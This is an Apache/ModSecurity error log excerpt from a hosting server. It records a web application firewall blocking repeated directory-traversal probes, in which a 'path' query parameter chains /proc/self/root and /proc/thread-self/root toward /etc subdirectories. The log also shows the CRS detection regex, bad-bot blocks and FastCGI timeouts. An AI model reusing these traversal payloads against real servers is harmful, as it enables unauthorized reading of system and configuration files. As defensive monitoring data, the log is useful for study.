[Tue Mar 17 19:18:17.501798 2026] [:error] [pid 11088:tid 140411565680384] [client 74.7.243.128:60080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnTKWmqtCojLHvu5cKGRgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:18:21.064075 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47716] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:18:43.133807 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:19:05.131686 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48380] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:19:27.125893 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48652] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:19:49.129789 2026] [proxy_fcgi:error] [pid 11088:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:20:01.416737 2026] [:error] [pid 11088:tid 140411733534464] [client 74.7.243.128:53740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnTkWmqtCojLHvu5cKGbgAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:20:11.109264 2026] [proxy_fcgi:error] [pid 6296:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:20:32.125782 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49606] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:20:54.106636 2026] [proxy_fcgi:error] [pid 29151:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49954] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:21:16.129877 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:21:38.649559 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.228.61:51876] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnT8sU6Sx0TG1YjmQjNDQAAAoQ"]
[Tue Mar 17 19:21:39.363930 2026] [:error] [pid 11088:tid 140411733534464] [client 74.7.244.43:39676] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnT82mqtCojLHvu5cKGjwAAAIE"]
[Tue Mar 17 19:21:48.119386 2026] [proxy_fcgi:error] [pid 25836:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50570] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:22:09.129779 2026] [proxy_fcgi:error] [pid 6296:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50858] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:22:25.866719 2026] [:error] [pid 11088:tid 140411649607424] [client 74.7.243.128:53740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUIWmqtCojLHvu5cKGpwAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:22:36.129870 2026] [proxy_fcgi:error] [pid 7437:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:23:00.133805 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:23:10.878687 2026] [core:alert] [pid 11088:tid 140411590858496] [client 74.7.243.128:53740] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:23:23.124284 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51752] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:23:45.121789 2026] [proxy_fcgi:error] [pid 25836:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52028] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:23:52.374541 2026] [:error] [pid 25836:tid 140411708356352] [client 74.7.243.128:58378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUeIh-PF_25v4hFRCInAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:24:07.129805 2026] [proxy_fcgi:error] [pid 7004:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52286] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:24:16.679421 2026] [:error] [pid 2598:tid 140411548894976] [client 216.73.216.191:8927] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUkBj0p0SRWAqcjGGX_wAAAxc"]
[Tue Mar 17 19:24:17.481407 2026] [:error] [pid 7004:tid 140411607643904] [client 216.73.216.191:30584] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUkcU6Sx0TG1YjmQjNQAAAApA"]
[Tue Mar 17 19:24:20.803443 2026] [:error] [pid 31803:tid 140411599251200] [client 216.73.216.191:13762] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUlOyqAr6etmhZHNpF1QAAAFE"]
[Tue Mar 17 19:24:29.125896 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:24:44.222431 2026] [:error] [pid 11816:tid 140411708356352] [client 216.73.216.191:57954] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUrOw_le52K8_3pV1r5AAAAgQ"]
[Tue Mar 17 19:24:51.082211 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:24:52.945347 2026] [:error] [pid 26799:tid 140411590858496] [client 216.73.216.191:35860] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUtNa6ubjKNq_cu4YlvQAAA1I"]
[Tue Mar 17 19:25:06.959517 2026] [:error] [pid 29151:tid 140411540502272] [client 216.73.216.191:51552] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUwvPqhzTj3BvfDX-mPwAAAdg"]
[Tue Mar 17 19:25:09.370472 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:60852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnUxew_le52K8_3pV1r-AAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 19:25:13.117790 2026] [proxy_fcgi:error] [pid 6296:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:25:22.832317 2026] [:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:39487] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnU0ta6ubjKNq_cu4YlxwAAA0E"]
[Tue Mar 17 19:25:34.133847 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:25:36.866757 2026] [:error] [pid 11816:tid 140411574073088] [client 216.73.216.191:57610] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnU4Ow_le52K8_3pV1sAgAAAhQ"]
[Tue Mar 17 19:25:43.173414 2026] [:error] [pid 7004:tid 140411674785536] [client 216.73.216.191:43045] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnU58U6Sx0TG1YjmQjNdgAAAog"]
[Tue Mar 17 19:25:56.129836 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:25:57.234852 2026] [:error] [pid 6296:tid 140411674785536] [client 216.73.216.191:24324] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnU9XIk7brgkOH-rIWrNQAAAUg"]
[Tue Mar 17 19:25:58.589086 2026] [core:alert] [pid 11088:tid 140411565680384] [client 74.7.243.128:54970] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware
[Tue Mar 17 19:26:18.129802 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:26:21.507709 2026] [:error] [pid 11088:tid 140411582465792] [client 74.7.241.31:33390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVDWmqtCojLHvu5cKHOQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:26:29.708059 2026] [:error] [pid 11088:tid 140411699963648] [client 216.73.216.191:11609] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVFWmqtCojLHvu5cKHQQAAAIU"]
[Tue Mar 17 19:26:39.611269 2026] [:error] [pid 11088:tid 140411741927168] [client 74.7.228.61:33110] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnVH2mqtCojLHvu5cKHRAAAAIA"]
[Tue Mar 17 19:26:40.057863 2026] [proxy_fcgi:error] [pid 11088:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54780] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:26:40.821761 2026] [:error] [pid 7004:tid 140411632822016] [client 74.7.244.43:51658] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnVIMU6Sx0TG1YjmQjNkAAAAo0"]
[Tue Mar 17 19:26:45.107178 2026] [:error] [pid 29151:tid 140411683178240] [client 216.73.216.191:47375] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVJfPqhzTj3BvfDX-mYwAAAcc"]
[Tue Mar 17 19:26:54.284603 2026] [:error] [pid 11816:tid 140411733534464] [client 216.73.216.191:56701] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVLew_le52K8_3pV1sIQAAAgE"]
[Tue Mar 17 19:27:01.069825 2026] [proxy_fcgi:error] [pid 29151:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:27:01.295710 2026] [:error] [pid 31803:tid 140411674785536] [client 216.73.216.191:18981] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVNeyqAr6etmhZHNpGEAAAAEg"]
